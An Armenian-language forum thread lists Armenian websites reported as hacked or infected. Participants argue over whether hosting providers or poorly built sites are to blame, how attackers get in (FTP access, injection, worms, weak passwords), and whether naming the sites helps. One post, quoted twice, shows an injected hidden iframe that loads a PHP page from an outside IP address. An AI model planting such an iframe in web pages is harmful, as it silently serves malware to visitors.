Նենգորդների զոհ դարձած հայկական կայքեր

[Սահակ]

_http://www.extremal.am/ և _http://www.meteo.am/ էլ վարակված չեն։

Ներկա պահին վարակված են հետևյալ հայկական կայքերը՝

_http://www.armeniantextile.com/
_http://www.mlm.am/

[Xelgen]

martik.am-ն է վարաքված։

[Tom]

Ժողովուրդ ջան ըտենց միք մատնացույց արեք կայքերը , եթե ուզում եք իմանալ համարյա բոլոր կայքերն էլ դառել են ու դառնում են նենգորդների զոհերը , ուղակի , որ կայքի webmaster -ը , որ ակտիվ ու ուշադիր է արագ վերացնում է կայքի էջերի մեջ ներդրված վիրուս բերող կոդը ու մտնելիս մենք չենք նկատում :
Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները .

[Elmo]

Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները .

Տենց բան չկա: Մեր հոստինգը կյանքում չի վարակվել, բայց վրայի սայթերը պարբերաբար ու հաճախակի «կոտրել» են: Էդ ծուռ գրած սայթերն են վարկյանական կոտրվում: Որ ֆիրմային սայթ ա պետք գալիս, իսկ իրանք պրոֆեսիոնալ վեբ ծրագրավորողի դիմելու փոխարեն տալիս են մեկի հորքուրի տղուն, որն էլ իր հերթին մի հատ շաբլոն ա քաշում, ու վրեն սայթ հավաքում:
Լավ գրած սայթը չի կոտրվում:

[Սահակ]

Ներկա պահին նենգորդների զոհ են դարձել՝
_http://www.armeniantextile.com/
_http://www.mlm.am/
_http://www.organic.am/

[Tom]

Տենց բան չկա: Մեր հոստինգը կյանքում չի վարակվել, բայց վրայի սայթերը պարբերաբար ու հաճախակի «կոտրել» են: Էդ ծուռ գրած սայթերն են վարկյանական կոտրվում: Որ ֆիրմային սայթ ա պետք գալիս, իսկ իրանք պրոֆեսիոնալ վեբ ծրագրավորողի դիմելու փոխարեն տալիս են մեկի հորքուրի տղուն, որն էլ իր հերթին մի հատ շաբլոն ա քաշում, ու վրեն սայթ հավաքում:
Լավ գրած սայթը չի կոտրվում:

Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`

Կոդ:

<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>

, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ

[NetX]

ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ

օրինակ PHP կամ SQL injection'ներ անելով,
իսկ մասայական վարակումների համար գռվում ա worm, որը վարակում ա կոնկրետ վերսիաների կոնկրետ դվիժոկներ/ֆորումներ կոնկրետ հայտնի ծակեր օգտագործելով...

[Elmo]

Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`

Կոդ:

<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>

, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ

Ավելի շատ հոստինգի վրայի ծակ սայթով են մտնում ՕՀ-ը վարակում, քան ՕՀ-ի ծակով՝ կայքերը:

[Xelgen]

Ժողովուրդ ջան ըտենց միք մատնացույց արեք կայքերը ,ուղակի , որ կայքի webmaster -ը , որ ակտիվ ու ուշադիր է արագ վերացնում է կայքի էջերի մեջ ներդրված վիրուս բերող կոդը ու մտնելիս մենք չենք նկատում :

Մատնացույց ենք անում են կայքերը որ երկար են վարաքված, շաբաթից ավել։ Ու ոչ մի խնդիր դրանում չեմ տեսնում։
Ավելին պետք է նորմալ համակարգ մշակել տենց դեպքերին արձագանքելու համար, ցավոք սրտի մեր CERT-ը չի գործում։

եթե ուզում եք իմանալ համարյա բոլոր կայքերն էլ դառել են ու դառնում են նենգորդների զոհերը

век живи, век учись..
Կկսիսվե՞ս աղբյուրներով որտեղ նշված կլինի որ կաքերի 70%-ից ավելը (համարյա բոլորը դա 95% ավել է, բայց չմանրանանք) գոնե մեկ անգամ «ջարդվել» են։

Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները

Տենց դեպքեր իհարկե լինում են, բայց կազմում են փոքրամասնություն ու հազիվ թե 5% գերազանցեն։

Օրինակի համար վերջին մի կես տարվա մեջ, մի 5-6 վարաքված կայքի դեպքով եմ զբաղվել, 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել, 2 դեպքում էլ գաղտաբառը-գազտնաբառ չեր։ Ինչքան պատշպանված հոսթինգ համակարգ ուզում ես մշակի, ինչքան ոււզում ես պաշտպավնած կայք նախագծի եթե գաղտնաբառը 111, qwerty կամ դոմեյնի անունn է դրա բանը վաղ թե ուշ գալու է, ու ավելի շուտ քան ուշ։

[Chuk]

Իսկ ես թեմայի իմաստը չեմ հասկանում... նրա տված օգուտը:
Եթե ուղղակի էստեղ նշում ենք այդ կայքերի մասին, ապա կայքերի տերերին դրանից ի՞նչ օգուտ: Ու ըստ էության դառնում է ինչ որ «ամոթանքի հարթակ»: Չգիտեմ, թեմայի տված օգուտը չեմ տեսնում:

[Սահակ]

Իսկ ես թեմայի իմաստը չեմ հասկանում... նրա տված օգուտը:
Եթե ուղղակի էստեղ նշում ենք այդ կայքերի մասին, ապա կայքերի տերերին դրանից ի՞նչ օգուտ: Ու ըստ էության դառնում է ինչ որ «ամոթանքի հարթակ»: Չգիտեմ, թեմայի տված օգուտը չեմ տեսնում:

Խնդիրը նրանում չի որ հայկական սայտեր ջարդվում են։ Խնդիրը նրանումա որ ջարդվելուց հետո, սայտի տերերը ամիսներ շարունակ ոչ մի բան չեն անում այդ սայտը մաքրելու համար։

Այս թեման բացեցի նրանից հետո երբ իմացանք որ ԱՄՆ-ում Հայաստանի դեսպանատան սայտում 3 ամսից ավել տրոյան էր դրած, ու սայտի տերերը ոչ մի բան չէին անում։ Այսինքն եթե սայտը ջարդվում է, գոնե սայտի տերերը պետք է սայտը միանգամից օֆֆլայն գցեն, ու սկսեն խնդրի վրա աշխատել, ոչ թե թողեն որ իրանց կայքերի վրա գրված լինի «հաքեդ բայ ազերբայաջան թիմ» ամիսներ շարունակ։

Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

[Chuk]

Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

Հենց ամբողջ խնդիրն այն է, որ եթե այս թեմայի արդյունքում կայքերի տերերը կիմանան ինչ է եղել, թեմայում խորհուրդներ կստանան, թե ի՞նչ է կարելի անել և այլն, ապա նորմալ կլինի: Բայց պրակտիկորեն տեսնում ենք, որ տեղադրվում է ջարդված կայքի հասցե, ապա որոշ ժամանակ անց դրվում է, որ կայքն արդեն աշխատում է կամ էլ ոչ, իսկ կայքերի տերերին սրանից օգուտ չկա, օգտագործողներին օգուտ չկա:

Հետևաբար ես մեկ օր էլ կմտածեմ ու բացառված չի, որ թեման կփակեմ:

Ավելացվել է 1 րոպե անց

ես ել իմ պատասխանը _http://www . organic . ի ջարդողներին.
աղջիկներին կխնդրեմ չնայել.
ազեները իրանց դրել են եսիմ ինչի տեղ

Սրա փոխարեն եթե կայքի տերերին տեղեկացնեիր ու եթե կարող ես, խորհուրդներ տայիր, ապա հրաշալի կլիներ: Իսկ նման բանի իմաստ ընդհանրապես չեմ տեսնում:

[NetX]

Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

http://cert.am/
http://cert.am/report_incident.html

[Phantom Lord]

Մի անգամ rocker.am-ն էին hack արել:

[SDes77]

Դեվելոպերները ինչան ուժ ունեն գցում են հոսթինգի վրա և հակառակը: Երեկ ARMINCo-ի հոսթինգն են ջարդել ըստ երևույթի(իհարկե իրենք "պրիզնատ" չեն գալիս), բայց դե մեկը բերանից թռցրեց, որ root-ի փասերին են ձեռք գցել: Արդյունքւմ մի 2-3 օր firefox-ը գուգլի շնորհիվ warning-ներ կբերի տեղադրված կայքերը բացելիս, չնայած վիրուսները արդեն վերացրել են: